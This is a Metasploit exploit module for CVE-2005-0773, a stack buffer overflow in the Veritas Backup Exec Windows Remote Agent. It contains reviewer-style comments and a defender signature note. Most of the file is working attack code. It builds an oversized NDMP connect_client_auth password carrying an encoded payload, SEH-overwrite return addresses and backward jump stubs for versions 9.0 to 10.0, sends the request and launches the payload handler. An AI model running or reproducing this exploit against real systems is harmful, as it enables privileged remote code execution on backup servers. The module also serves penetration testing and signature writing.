##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Metasploit exploit module for CVE-2005-0773: a stack buffer overflow in the
  # Veritas Backup Exec Windows Remote Agent, reached over NDMP (RPORT 10000 by
  # default) through a connect_client_auth request of authentication type 3
  # whose password field is oversized. The iDefense and vendor write-ups are
  # listed under 'References'; the vendor reference (Veritas doc 276604) is the
  # place to look for the fix.
  #
  # Defender notes: the request built in `exploit` (message name 0x901, auth
  # type 3, a 512-byte username and an 8192-byte password) is far outside any
  # legitimate credential length and makes a simple network signature. `check`
  # only fingerprints the NDMP banner and never sends the overflow.
  Rank = GreatRanking

  # NDMP transport mixin; the ndmp_recv/ndmp_send/ndmp_info helpers used below
  # presumably come from here (the mixin is not in this file).
  include Msf::Exploit::Remote::NDMP

  # Registers module metadata (name, references, payload constraints, targets)
  # and the RPORT option.
  #
  # @param info [Hash] module info merged by update_info; normally empty.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Windows Remote Agent Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Veritas
        BackupExec Windows Agent software. This vulnerability occurs
        when a client authentication request is received with type
        '3' and a long password argument. Reliable execution is
        obtained by abusing the stack buffer overflow to smash a SEH
        pointer.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2005-0773'],
          [ 'OSVDB', '17624'],
          [ 'BID', '14022'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
          [ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
        ],
      # The agent runs with elevated rights, so a successful session is
      # flagged as privileged.
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      # Payload generator constraints: 1024 bytes of room, NUL is the only
      # forbidden byte (the password travels as a length-prefixed string),
      # and the stack pointer is moved down 3500 bytes before the payload
      # runs so it does not overwrite itself.
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      # Each target carries two return addresses: Rets[0] is written at the
      # 9.0/9.1 offset and Rets[1] at the 10.0 offset (see `exploit`). The
      # second target uses a Windows 2000 specific address for both.
      'Targets'        =>
        [
          [
            'Veritas BE 9.0/9.1/10.0 (All Windows)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x0140f8d5, 0x014261b0 ],
            },
          ],
          [
            'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x75022ac4, 0x75022ac4 ],
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 22 2005'))

    # 10000 is the standard NDMP port.
    register_options(
      [
        Opt::RPORT(10000)
      ], self.class)
  end

  # Passive version check: reads the NDMP host-info banner and reports
  # Detected when the vendor is VERITAS and the version string is exactly
  # "4.2" or "5.1"; anything else (including no banner) is Safe.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    info = ndmp_info()
    # Guard against a missing banner or a banner without a Version field.
    if (info and info['Version'])
      print_status(" Vendor: #{info['Vendor']}")
      print_status("Product: #{info['Product']}")
      print_status("Version: #{info['Version']}")

      # NOTE(review): ^/$ are line anchors; \A/\z would be the strict
      # whole-string match, though for a single-line banner field the
      # result is the same.
      if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
        return Exploit::CheckCode::Detected
      end
    end
    return Exploit::CheckCode::Safe
  end

  # Sends the malformed connect_client_auth request and then starts the
  # payload handler.
  #
  # Layout of the 8192-byte password buffer (offsets in bytes):
  #   ..3536        payload, placed so it ends at 3536
  #   3536..3548    version 10.0 stub: short jmp +6, Rets[1], near jmp back
  #   4524..4536    version 9.0/9.1 stub: short jmp +6, Rets[0], near jmp back
  # Both near jumps (rel32 -1037 and -2025) resolve to offset 2512, which is
  # 3536 - 1024, i.e. the start of a full 'Space'-sized payload; this relies
  # on the framework padding the encoded payload up to 'Space' — TODO confirm
  # for the framework version in use. The 4-byte Rets value in each stub is
  # the overwritten SEH handler pointer described in 'Description'.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Consume the server's initial NDMP notification before sending anything.
    resp = ndmp_recv()

    username = 'X' * 512
    password = rand_text_alphanumeric(8192)

    # Place our payload early in the request and jump backwards into it
    password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

    # This offset is required for version 10.0
    # "\xeb\x06" is an x86 short jump over the following 4-byte address.
    password[3536, 2] = "\xeb\x06"
    password[3540, 4] = [ target['Rets'][1] ].pack('V')
    # "\xe9" + rel32 is an x86 near jump; the negative displacement lands
    # back inside the payload region.
    password[3544, 5] = "\xe9" + [-1037].pack('V')

    # This offset is required for version 9.0/9.1
    password[4524, 2] = "\xeb\x06"
    password[4528, 4] = [ target['Rets'][0] ].pack('V')
    password[4532, 5] = "\xe9" + [-2025].pack('V')

    # Create the authentication request
    # Seven big-endian 32-bit header words, then two length-prefixed strings
    # (username, password) and a trailing word.
    auth = [
      1,              # Sequence number
      Time.now.to_i,  # Current time
      0,              # Message type (request)
      0x901,          # Message name (connect_client_auth)
      0,              # Reply sequence number
      0,              # Error status
      3               # Authentication type
    ].pack('NNNNNNN') +
      [ username.length ].pack('N') + username +
      [ password.length ].pack('N') + password +
      [ 4 ].pack('N')

    print_status("Sending authentication request...")
    ndmp_send(auth)

    # Attempt to read a reply (this should fail)
    ndmp_recv()

    handler
    disconnect
  end

end